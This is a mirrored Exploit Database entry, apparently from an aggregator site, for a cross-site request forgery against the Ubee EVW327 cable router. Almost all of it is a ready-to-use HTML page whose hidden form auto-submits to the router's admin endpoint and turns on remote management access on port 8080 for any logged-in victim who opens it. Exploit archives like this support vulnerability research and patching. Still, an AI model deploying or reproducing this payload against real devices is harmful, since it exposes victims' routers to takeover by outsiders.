Ubee EVW327 – ‘Enable Remote Access’ Cross-Site Request Forgery (CSRF)

• Exploit Database
• 114 阅读

• 作者： lated
  日期： 2021-06-01
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/49920/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

  # Exploit Title: Ubee EVW327 - &apos;Enable Remote Access&apos; Cross-Site Request Forgery (CSRF) # Date: 2021-05-30 # Exploit Author: lated # Vendor Homepage: https://www.ubeeinteractive.com # Version: EVW327   <html> <body> <form action="http://192.168.0.1/goform/UbeeMgmtRemoteAccess" method="POST"> <input type="hidden" name="RemoteAccessEnable" value="1"/> <input type="hidden" name="RemoteAccessPort" value="8080"/> <input type="hidden" name="ApplyRemoteEnableAction" value="1"/> </form> <script> document.forms[0].submit(); </script> </body> </html>